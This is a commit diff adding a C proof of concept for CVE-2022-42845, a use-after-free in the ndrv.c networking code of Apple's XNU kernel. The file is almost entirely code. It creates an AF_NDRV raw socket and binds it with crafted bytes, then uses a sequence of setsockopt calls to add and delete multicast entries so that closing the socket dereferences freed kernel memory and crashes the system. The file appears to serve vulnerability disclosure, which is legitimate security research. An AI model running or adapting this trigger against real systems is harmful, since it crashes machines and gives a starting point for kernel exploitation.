■ ■ ■ ■ ■ ■
CVE-2022-42845/CVE-2022-42845.c
| | 1 | + | #include <stddef.h> |
| | 2 | + | #include <sys/socket.h> |
| | 3 | + | #include <netinet/in.h> |
| | 4 | + | #include <stdio.h> |
| | 5 | + | #include <unistd.h> |
| | 6 | + | #include <string.h> |
| | 7 | + | #include <stdlib.h> |
| | 8 | + | |
| | 9 | + | /* |
| | 10 | + | |
| | 11 | + | Author: Adam Doupe (adamd) |
| | 12 | + | POC for CVE-2022-42845: a kernel use-after-free vulnerability in ndrv.c in XNU. |
| | 13 | + | Writeup: https://adamdoupe.com/blog/2022/12/13/cve-2022-42845-xnu-use-after-free-vulnerability-in-ndrv-dot-c/ |
| | 14 | + | |
| | 15 | + | */ |
| | 16 | + | |
| | 17 | + | |
| | 18 | + | #define TCPOPT_SACK 5 |
| | 19 | + | #define TCPOLEN_CC 6 |
| | 20 | + | |
| | 21 | + | struct sockaddr_generic { |
| | 22 | + | uint8_t sa_len; |
| | 23 | + | uint8_t sa_family; |
| | 24 | + | }; |
| | 25 | + | |
| | 26 | + | int main() |
| | 27 | + | { |
| | 28 | + | int sockfd = socket(AF_NDRV, SOCK_RAW, IPPROTO_IP); |
| | 29 | + | if (sockfd == -1) |
| | 30 | + | { |
| | 31 | + | perror("socket"); |
| | 32 | + | return -1; |
| | 33 | + | } |
| | 34 | + | |
| | 35 | + | char* sa_data = "lo0"; |
| | 36 | + | struct sockaddr_generic sag_s = { |
| | 37 | + | .sa_len = (sizeof(struct sockaddr_generic) + strlen(sa_data) + 1), |
| | 38 | + | .sa_family = AF_NS, |
| | 39 | + | }; |
| | 40 | + | |
| | 41 | + | char* sockaddr = (char*) malloc(sag_s.sa_len); |
| | 42 | + | memcpy(sockaddr, &sag_s, sizeof(struct sockaddr_generic)); |
| | 43 | + | memcpy(sockaddr + sizeof(struct sockaddr_generic), sa_data, strlen(sa_data) + 1); |
| | 44 | + | |
| | 45 | + | char* sockaddr_real = "\x05\x00\x6c\x6f\x30"; |
| | 46 | + | int size = 5; |
| | 47 | + | int result = bind(sockfd, (struct sockaddr*)sockaddr_real, size); |
| | 48 | + | |
| | 49 | + | if (result != 0) |
| | 50 | + | { |
| | 51 | + | perror("bind"); |
| | 52 | + | return -1; |
| | 53 | + | } |
| | 54 | + | |
| | 55 | + | // Add B to `nd_multiaddrs` |
| | 56 | + | |
| | 57 | + | char val[] = "\010\000\000\000\000\000\000\000"; |
| | 58 | + | int val_size = 8; |
| | 59 | + | result = setsockopt(sockfd, 0, TCPOPT_SACK, val, val_size); |
| | 60 | + | if (result != 0) |
| | 61 | + | { |
| | 62 | + | perror("setsockopt"); |
| | 63 | + | return -1; |
| | 64 | + | } |
| | 65 | + | |
| | 66 | + | // Add A to `nd_multiaddrs` (which becomes the head) |
| | 67 | + | |
| | 68 | + | char val_2[] = "\010\000\000\374\377\000\000\000"; |
| | 69 | + | int val_2_size = 8; |
| | 70 | + | result = setsockopt(sockfd, 0, TCPOPT_SACK, val_2, val_2_size); |
| | 71 | + | if (result != 0) |
| | 72 | + | { |
| | 73 | + | perror("setsockopt"); |
| | 74 | + | return -1; |
| | 75 | + | } |
| | 76 | + | |
| | 77 | + | // Delete B |
| | 78 | + | result = setsockopt(sockfd, 0, TCPOLEN_CC, val, val_size); |
| | 79 | + | if (result != 0) |
| | 80 | + | { |
| | 81 | + | perror("setsockopt"); |
| | 82 | + | return -1; |
| | 83 | + | } |
| | 84 | + | |
| | 85 | + | // At this point B is freed, so we can call multiple functions to exploit |
| | 86 | + | |
| | 87 | + | // closing the socket will call `ndrv_do_remove_multicast` which will crash referencing the deallocated B |
| | 88 | + | close(sockfd); |
| | 89 | + | } |
| | 90 | + | |
Adam Doupe
committed
1 year ago
1 parent efe3853e